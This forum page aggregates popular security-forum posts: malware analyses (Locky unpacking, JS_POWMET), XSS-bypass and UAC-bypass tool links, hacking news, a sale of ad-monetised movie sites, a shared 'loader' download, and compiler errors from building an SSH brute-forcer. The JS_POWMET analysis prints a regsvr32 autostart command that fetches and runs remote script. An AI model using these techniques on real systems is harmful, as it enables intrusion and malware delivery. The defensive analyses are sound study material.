Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 08/04/17 in all areas

  1. Tutorial pentru bypass filtre XSS, in doua parti (momentan). Primul contine chestii generice (hex, control characters, octal): http://blog.rakeshmane.com/2016/11/xssing-web-part-1.html Aici se concentreaza pe Unicode (UTF-8, UTF-16, UTF-32, BOM) http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html
    4 points
  2. Unpacking Locky I will show you how to unpack a Locky sample with OllyDbg. This packer is indeed an easy one. But you will see for yourself. Download the sample from Hybrid-Analysis. An alternative way of unpacking this sample is in this video on my channel: The first thing I always do is a static check with a PE analysis tool like PortexAnalyzer. The image will look as follows and already tell us that the file is packed. Several sections of the file have a high entropy, including the .rdata section. Packer identifies like DIE will not know what was used to pack it, because the packer is a custom one. This is often the case with malware samples. This packer has the quirky characteristic to always add 32-bit Edition to the file version information whilst the other information changes: StringFileInfo --------------- language ID: 0x0409 code page: 0x04b0 CompanyName: Doubtsoftware.com FileDescription: Advanced Task Scheduler 32-bit Edition FileVersion: 4.1.0.612 InternalName: #dvenced Task Scheduler 32-bit Edition LegalCopyright: Copyright © Southsoftware.com, 2002-2015 OriginalFilename: Bifscheduler_edmin.exe ProductName: Advanced Task Scheduler 32-bit Edition ProductVersion: 4.1.0.612 The debug information has a strange, unknown type, hence Portex does not parse it any further: Debug Information ***************** Time Date Stamp: Thu Dec 09 05:07:00 CET 2083 Type: 4102553603 no description available If you look into the binary (tip: search for 'RSDS' to find it with the hex editor) you will see that there is debug path that has been created or modified in a random fashion: Z:\as\28cxkoao\azoozykz\l0t\jx\w9y4cni\jyc6mq3\mvnt.pdb Whilst this does not help to unpack the file, it might help to recognize this custom packer in the future. A check of the strings in the binary and the imports won't get us any further. If you get this sample in a fresh state, you will easily see that this is Locky with dynamic analysis. But once the samples are older and can't find a working C&C, they won't encrypt anymore. Now load the binary with OllyDbg. Don't forget to take a snapshot of your VM at this point. Simply step over with F8 while keeping your eyes open. If you happen to step over the following call you will see that the sample is doing a lot (reload the sample if that happens), so you should step into it instead (press f7). The same happens at the following call, also step into: Just keep on going like this, stepping over calls unless they start to do a lot, and keep your eyes open. At address 0x402364 you might notice that the code writes to the .rdata section (0x417EE on that image). Indeed, if you put a breakpoint to the instruction and watch .rdata in the dump window while running to the breakpoint (F9), you will see how .rdata gets decrypted. The jump to the .rdata section appears in 0x4020F0. Note that push followed by ret equals a jump instruction. This ret instruction will jump to 0x41577A. Compare that with the PortexAnalyzer report or the Memory window in OllyDbg to verify that this virtual address is in the .rdata section. Unfortunately we are not there yet. The decrypted code in the .rdata section is also a packer stub. Step through the code for a while. At some point you will see that the code collects addresses to common DLL functions with GetProcAddress. One of those is RtlDecompressBuffer, which is used by lots of packers to unpack their payload. Break at address 0x415B37. Right-click the value of EAX and click "Follow in Disassembler". You will now see the code of the RtlDecompressBuffer function. Break at the PUSH DWORD PTR [EBP + C] instruction: Now right-click the EDI value and Follow in Dump You will see an empty dump window And after stepping over (F8) the file will unpack in memory. The last thing to do is to open the Memory window and select the right memory area to dump the unpacked executable. Choose the location to save the dump to and you are done. The result is an unpacked Locky as you can verify by checking the strings of the dump or looking at it with a hex editor. Posted 8 hours ago by Karsten Hahn Sursa: http://struppigel.blogspot.de/2017/08/unpacking-locky.html
    3 points
  3. Authorities arrested the UK security researcher known for stopping the WannaCry ransomware attack in May. On Wednesday, 22-year-old Marcus Hutchins -- also known as MalwareTech -- was arrested in Las Vegas for "his role in creating and distributing the Kronos banking Trojan," according to a spokesperson from the U.S. Department of Justice. The charges relate to alleged conduct occurring between July 2014 and July 2015. According to an indictment provided to CNN Tech, Hutchins created the malware and shared it online. Earlier this year, Hutchins became an internet hero when he helped stop WannaCry, a cyberattack that targeted over 150 countries. The ransomware locked down computers and demanded $300 to get files back. Hutchins, who is a malware researcher at the Kryptos Logic security firm, created a killswitch that prevented the spread of the virus. Friends and family have not been able to speak with Hutchins, according to a person close to the situation. The news of the detention was first reported by Motherboard. This story is developing. sursa: http://money.cnn.com/2017/08/03/technology/culture/malwaretech-arrested-las-vegas-trojan/index.html acuzarea: https://www.documentcloud.org/documents/3912524-Kronos-Indictment-R.html pe acelasi subiect: https://motherboard.vice.com/en_us/article/ywp8k5/researcher-who-stopped-wannacry-ransomware-detained-in-us-after-def-con https://www.theguardian.com/technology/2017/aug/03/researcher-who-stopped-wannacry-ransomware-detained-in-us?CMP=share_btn_tw
    2 points
  4. " Your Node.js authentication tutorial is wrong ... digging through various Node.js tutorials, as it seems that every Node.js developer with a blog has released their own tutorial on how to do things the right way, or, more accurately, the way they do them. Thousands of front-end developers being thrown into the server-side JS maelstrom are trying to piece together actionable knowledge from these tutorials, either by cargo-cult-copypasta or gratuitous use of npm install as they scramble frantically to meet the deadlines set for them by outsourcing managers or ad agency creative directors. One of the more questionable things in Node.js development is that authentication is largely left as an exercise to the individual developer. The de facto authentication solution in the Express.js world is Passport, which offers a host of strategies for authentication. If you want a robust solution similar to Plataformatec’s Devise for Ruby on Rails, you’ll likely be pointed to Auth0, a startup who has made authentication as a service. Compared to Devise, Passport is simply authentication middleware, and does not handle any of the other parts of authentication for you: that means the Node.js developer is likely to roll their own API token mechanisms, password reset token mechanisms, user authentication routes and endpoints, and views in whatever templating language is the rage today. Because of this, there are a lot of tutorials that specialize in setting up Passport for your Express.js application, and nearly all of them are wrong in some way or another, and none properly implement the full stack necessary for a working web application..... " Source: https://medium.com/@micaksica/your-node-js-authentication-tutorial-is-wrong-f1a3bf831a46
    2 points
  5. EDITAT: Vezi ultimul reply. Salut, dupa cum spune si titlul vand 3 site-uri, toate 3 sunt pe nisa filme / seriale online. Site 1: Vechime in jur de o luna. Domeniu: Namecheap Webhost: Mxhost - 7e / luna Trafic: https://s2.postimg.org/udd7mnj6h/Screenshot_2017-07-31-16-45-45.png Astazi ajunge la 4,5k. Produce in jur de 2.25$ pe zi din popads + in jur de 1.10-1.20 bc.vc fake player. https://s3.postimg.org/g2i7id5wj/popads.png. La bc.vc nu pot sa pun dovezi per site si promovez cu 4 site-uri. Are un backlink pe articol pe un site cu autoritate. Rankeaza bine, o sa va dau site-ul in pm daca e necesar. Tema este keremiya insa optimizata SEO si facuta responsive + ceva design modificat. (Valabil pentru toate site- urile). Pretul nu este stabilit, astept oferte de la voi. Probabil o sa creasca mult odata cu lansarile din August. Site 2: Vechime aproape doua luni, uitasem de el si mi-am reamintit cand am primit email ca imi anuleaza daca nu platesc. Domeniu: Namecheap Webhost: Mxhost - 7e / luna Trafic: http://postimg.org/image/l5yq6urgv/ - Azi ajunge la 2K. Produce in jur de 1.22$ pe popads (cu tot cu perioadele proaste din graficul de trafic) si pe bc.vc in jur 0,50- 0,70$. https://s3.postimg.org/xl48mi62b/popads.png Tema la fel, iar pretul nici aici nu este stabilit, astept oferte. Site 3: Domeniu: Namecheap Webhost: 2gb.ro, o oferta speciala cu 5 GB spatiu si Ip dedicat. 4euro/luna Acest site este cel mai nou din toate avand, doar o saptamana. Cu toate astea, azi trece de 1k, probabil ajunge la 1,5k iar sambata am avut 190 din pricina unor probleme. https://s4.postimg.org/9nxbmmza5/Screenshot_2017-07-31-16-46-00.png Azi i-am pus reclame popads, asa ca momentan nu am ce sa arat. Pe bc.vc produce lejer un 0,50$. Astept oferte in PM, daca e nevoie va prezint si site-urile. Plata doar paypal. A, asa se prezinta panoul general popads + bc.vc, in caz ca doriti sa luati toate site-urile. https://postimg.org/gallery/2501kls2i/ P.S! Mentionez ca eu am ales pe toate trei sa pun doar trailerele, dupa ce transfer domeniul in contul dvs puteti sa faceti orice modificare doriti. P.S2! Ofer acces la Google Analytics pentru a va convinge ca traficul este real si pentru a putea vedea toate detaliile.
    1 point
  6. Cica non-resident loader...AppData\Roaming\RND.exe http://dropmefiles.com/NspkA
    1 point
  7. Daca site-ul e privat, gen access cu invitatie (e.x: filelist dot ro) + hosting undeva in suedia e ok, daca vrei sa faci ceva public iei domeniu si host off-shore.
    1 point
  8. iOS 10.3.2 XPC Userland Jailbreak Exploit Tutorial - CVE-2017-7047 by Ian Beer Publicat pe 3 aug. 2017 Just thought I'd make a quick video explaining a bit about the new user land research tool & exploit released by Ian Beer for iOS 10.3.2! Currently this project only allows you to mess with user land processes such as backboardd, launchd, SpringBoard, etc & is DOES NOT provide a method of fully jailbreaking & patching the kernel and installing Cydia and other jailbroken packages onto the device. Download the tool - https://bugs.chromium.org/p/project-z... Thanks for watching! ∎∎∎My Social Media∎∎∎ Twitter - https://bit.ly/2rA593q Website - https://bit.ly/2sDHJiB
    1 point
  9. A Look at JS_POWMET, a Completely Fileless Malware Posted on:August 2, 2017 at 7:00 am Posted in:Malware Author: Trend Micro By Michael Villanueva As cybercriminals start to focus on pulling off attacks without leaving a trace, fileless malware, such as the recent SOREBRECT ransomware, will become a more common attack method. However, many of these malware are fileless only while entering a user’s system, as they eventually reveal themselves when they execute their payload. Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine. Initial reports from our Smart Protection Network (SPN) data reveals JS_POWMET affecting APAC the most, with almost 90% of the infections coming from the region. Technical Details Figure 1: JS_POWMET infection Diagram Although the exact method of arrival is still not certain, it is likely that the trojan is downloaded by users that visit malicious sites, or as a file that is dropped by other malware. What is clear about this malware is that the following registry has already been changed by the time it is downloaded into the system. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll” JS_POWMET is downloaded via an autostart registry entry (shown above). Here are the descriptions for the following parameters used by “regsvr32”: /s = silent option for regsvr32 /n = tells regsvr32 not to use DllRegisterServer /u = Unregister server/object /i = used for passing an optional parameter (ie. URL) to DLLinstall scrobj.dll = Microsoft’s Script Component Runtime In this method, a URL was given to regsvr32 as a parameter, which will make regsvr32 capable of fetching the file (XML with malicious JavaScript) found on the URL. Due to this routine, regsvr32 will become capable of executing arbitrary scripts without saving the XML file on the machine/system. In particular, whenever the affected machine starts up, it will automatically download the malicious file from its Command & Control (C&C) server. Once JS_POWMET is executed, it will then download another file known as TROJ_PSINJECT (Detected by Trend Micro as TROJ_PSINJECT.A). This file is a Powershell script that runs under the process of Powershell. TROJ_PSINJECT will connect to the following website: hxxps://bogerando[.]ru/favicon This allows TROJ_PSINJECT to download a normal file called favicon. The favicon file will then be decrypted and injected into its process using ReflectivePELoader, which is used for injecting EXE/DLL files. To deobfuscate the malware code, it uses the following techniques. Initially, the malware contains Base64 Strings that will be decoded and decrypted using the RC4 key (which is hard-coded into the malware code). The resulting decrypted strings will be a GZIP-compressed string that is decompressed by the malware itself using the GZIP-decompression routine. This results in the codes for the ReflectivePELoader function that will be used to load the decrypted downloaded file. Favicon will also be decrypted using the aforementioned RC4 key, resulting in a malicious DLL file known as BKDR_ANDROM (Detected by Trend Micro as BKDR_ANDROM.ETIN). Again, this part of the process is also fileless; the file will not be saved into the machine but rather injected into the powershell.exe process. All of these routines will be executed by the malware using PowerShell commands. Figure 2: TROJ_PSINJECT code showing the deobfuscation process BKDR_ANDROM will terminate powershell.exe if it is found running in the system. In addition, it will also gather the following data: Root Volume Serial Number Operating System Version Local IP Address Administrator privileges The malware will add registry entries into the system to ensure that it always executes during startup. The autostart registry entry is capable of decoding the Base64-encoded PowerShell command, which will be used to decrypt the encrypted binary data (also found on the registry, added by the malware) that will result in the malicious codes of BKDR_ANDROM. After the decryption process, it will then execute the decrypted malicious codes. While the final payload in this case consists of common routines of BKDR_ANDROM, there is also a chance that future malware authors might make use of other malware as payload. Conclusion While JS_POWMET and the rest of the files it downloads are relatively light in terms of impact, this malware demonstrates the lengths cybercriminals will go to avoid detection and analysis. It also shows that even relatively uncommon infection methods involving fileless malware continually evolve. Organizations and users should always look beyond the obvious malware files and always be on the lookout for “stealthy” malware that manages to slip into the system virtually unnoticed. One of the more effective methods for mitigating the effects of fileless malware would be to limit access to critical infrastructure via container-based systems that separate endpoints from the most important parts of the network. For this specific malware, IT professionals can also look into disabling Powershell itself to help mitigate the effects of JS_POWMET and its various payloads. Trend Micro Solutions Fileless malware is designed to make detection by security solutions more difficult, as such organizations need to implement multilayered solutions that can help in detection. Trend Micro endpoint solutions such as Trend Micro™ Security, OfficeScan, and Worry-Free Business Security include behavior monitoring to detect this type of malware; this can help organizations look out for malicious behavior that can block the malware before the behavior is executed or performed. With additional analysis from Byron Gelera The following hashtags were used for this article: 7004b6c1829a745002feb7fbb0aad1a4d32c640a6c257dc8d0c39ce7b63b58cc (TROJ_PSINJECT.A) e27f417b96a33d8449f6cf00b8306160e2f1b845ca2c9666081166620651a3ae (JS_POWMET.DE) bff21cbf95da5f3149c67f2c0f2576a6de44fa9d0cb093259c9a5db919599940 (BKDR_ANDROM.ETIN) Sursa: http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/
    1 point
  10. Inainte de ISR era MortalTeam, de unde am inceput si eu. Puscas_Marin, Ras, EMINEM faceau parte din staff.
    1 point
  11. UACMe - Defeating Windows User Account Control by EP_X0FF » Fri Dec 19, 2014 8:19 am Inspired by ITW WinNT/Pitou legacy MBR x86-64 bootkit dropper. Before anything else read this excellent work -> Windows 7 UAC whitelist, read it carefully as it explains everything especially why Windows User Account Control is a big fucken marketing joke from Microsoft just like DSE. Below is our variant of his work with removal of all C++ trash and adapting different UAC bypass method from WinNT/Pitou (bootkit authors also used as base Leo Davidson work). The only setting UAC somehow is able to show itself - if they are set on maximum. But here revealed another Microsoft UAC architecture flaw by design - even when it blocks something, it cannot properly determine what it blocked, representing possible malicious actions as taken by Microsoft, facepalm. Will you trust verified Microsoft action with verified digital certificate from Microsoft? Supported Windows version, all from 7xxx builds up to latest so "confidential" MS build 9901. Project overview: Win32 and x64 configurations. Compiled in MSVS 2013 U4, used pure C, compiled as C++ No additional dependencies. All libs in attach. Debug builds configurations present only for debugging stuff not for UAC bypass stage execution (shellcode will be screwed up). Require Heavens Gate adaptation for proper work from Win32 app under WOW64, if you don't know what is HG then skip this moment. x64 loader VT https://www.virustotal.com/en/file/78caa8fa31a802547b160f41c03fd825d01d1edcd064e06984d0cf84a3bc7813/analysis/1418968668/ x86-32 loader VT https://www.virustotal.com/en/file/97952e6bb9cb4b3c43215597be0bb1da504d2066fd1717c20d6fd64917311c06/analysis/1418968812/ Screeenshots taken from Windows 10 TP build 9901 uac101.png (325.47 KiB) Viewed 16 times uac102.png (215.73 KiB) Viewed 16 times Attachments UACME.rar pass: uacme(498.9 KiB) Downloaded 6 times Sursa: KernelMode.info • View topic - UACMe - Defeating Windows User Account Control
    1 point
  12. Hackers Hijacked Chrome Extension for Web Developers With Over 1 Million Users " ..., another popular Chrome extension 'Web Developer' was hijacked by some unknown attackers, who updated the software to directly inject advertisements into the web browser of over its 1 million users. Chris Pederick, the creator of Web Developer Chrome extension that offers various web development tools to its users, alerted late Wednesday that some unknown hackers apparently phished his Google account, updated the extension to version 0.4.9, and pushed it out to its 1,044,000 users. In both the cases, cyber criminals used phishing first to gain access to the developers' Google accounts, hijacked their respective extensions and then updated the extension to perform malicious tasks. " Source: https://thehackernews.com/2017/08/chrome-extension-for-web-developers.html
    1 point
  13. Nou comunicat de presa DOJ https://www.documentcloud.org/documents/3912820-MAN-CHARGED-for-HIS-ROLE-in-CREATING-the-KRONOS.html (conform https://twitter.com/cfarivar/status/893198435817472000)
    1 point
  14. 1 point
  15. http://dropmefiles.com/BnLLT
    1 point
  16. 1 point
  17. Trimis. Site 2 ramane la 30 de euro. Site 1 la 100. Site 3 indisponibil
    1 point
  18. Pai de ce nu actioneaza nimeni, daca nu e safe ? :/ Ca sunt interesat de ce spune acolo...
    -1 points
  19. am eroare cu liburile : root@vps:/usr/local/lib/libssh2-1.8.0# gcc -o brute sursa.c -I /usr/local/include/ -L /usr/local/lib/libssh2-1.8.0 -static -lssh2 -lssl -lcrypto -ldl -lz -lpthread sursa.c: In function 'check_sockets': sursa.c:141:25: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] (char *)inet_ntoa(connlist.addr.sin_addr)); ^ sursa.c:156:21: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] (char *)inet_ntoa(connlist.addr.sin_addr)); ^ sursa.c: In function 'scanbclass': sursa.c:403:5: warning: too many arguments for format [-Wformat-extra-args] snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port); ^ sursa.c:403:5: warning: too many arguments for format [-Wformat-extra-args] sursa.c:410:5: warning: too many arguments for format [-Wformat-extra-args] printf("[-] Searching: ", bclass); ^ sursa.c:486:5: warning: format '%u' expects argument of type 'unsigned int', but argument 2 has type 'time_t' [-Wformat=] printf("\n[!] Scanare completa In %u Secunde. [Avem aici %d ips]\n", (time(0) - scantime), tot); ^ /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(channel.o): In function `libssh2_channel_x11_req_ex': (.text+0x1ad3): undefined reference to `gcry_randomize' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(transport.o): In function `_libssh2_transport_send': (.text+0x9b5): undefined reference to `gcry_randomize' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(transport.o): In function `_libssh2_transport_send': (.text+0xb4f): undefined reference to `gcry_randomize' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_new': (.text+0x7e): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_new': (.text+0xa4): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0xf9): undefined reference to `gcry_md_hash_buffer' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0x116): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0x12f): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0x144): undefined reference to `gcry_pk_verify' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0x14f): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0x159): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_verify': (.text+0x18e): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_new': (.text+0x203): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_new': (.text+0x24e): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_sign': (.text+0x777): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_sign': (.text+0x791): undefined reference to `gcry_pk_sign' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_sign': (.text+0x79d): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_sign': (.text+0x7b6): undefined reference to `gcry_sexp_find_token' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_rsa_sha1_sign': (.text+0x7d2): undefined reference to `gcry_sexp_nth_data' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x8ac): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x8c6): undefined reference to `gcry_pk_sign' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x8d2): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x912): undefined reference to `gcry_sexp_find_token' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x932): undefined reference to `gcry_sexp_nth_data' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x96f): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x980): undefined reference to `gcry_sexp_find_token' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x99c): undefined reference to `gcry_sexp_nth_data' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x9e0): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_sign': (.text+0x9ef): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xa8e): undefined reference to `gcry_md_hash_buffer' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xab0): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xadd): undefined reference to `gcry_sexp_build' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xaf3): undefined reference to `gcry_pk_verify' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xaff): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xb09): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_dsa_sha1_verify': (.text+0xb3e): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xb7b): undefined reference to `gcry_cipher_get_algo_keylen' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xb8d): undefined reference to `gcry_cipher_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xba0): undefined reference to `gcry_cipher_setkey' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xbb1): undefined reference to `gcry_cipher_get_algo_blklen' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xbc8): undefined reference to `gcry_cipher_setiv' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xbe9): undefined reference to `gcry_cipher_setctr' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xbfa): undefined reference to `gcry_cipher_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_init': (.text+0xc05): undefined reference to `gcry_cipher_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_crypt': (.text+0xc21): undefined reference to `gcry_cipher_decrypt' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(libgcrypt.o): In function `_libssh2_cipher_crypt': (.text+0xc29): undefined reference to `gcry_cipher_encrypt' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(global.o): In function `libssh2_init': (.text+0x36): undefined reference to `gcry_control' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_dtor': (.text+0x8): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_dtor': (.text+0x28): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_signv': (.text+0xc4): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_signv': (.text+0xf1): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_signv': (.text+0x102): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_signv': (.text+0x124): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_initPEM': (.text+0x19f): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_dss_init': (.text+0x20d): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_signv': (.text+0x35c): undefined reference to `gcry_md_open' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_signv': (.text+0x381): undefined reference to `gcry_md_write' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_signv': (.text+0x392): undefined reference to `gcry_md_read' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_signv': (.text+0x3b4): undefined reference to `gcry_md_close' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_initPEM': (.text+0x43f): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(hostkey.o): In function `hostkey_method_ssh_rsa_init': (.text+0x4a9): undefined reference to `gcry_sexp_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x161): undefined reference to `gcry_mpi_release' /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/libssh2.a(kex.o): In function `diffie_hellman_sha1': (.text+0x172): undefined reference to `gcry_mpi_release' 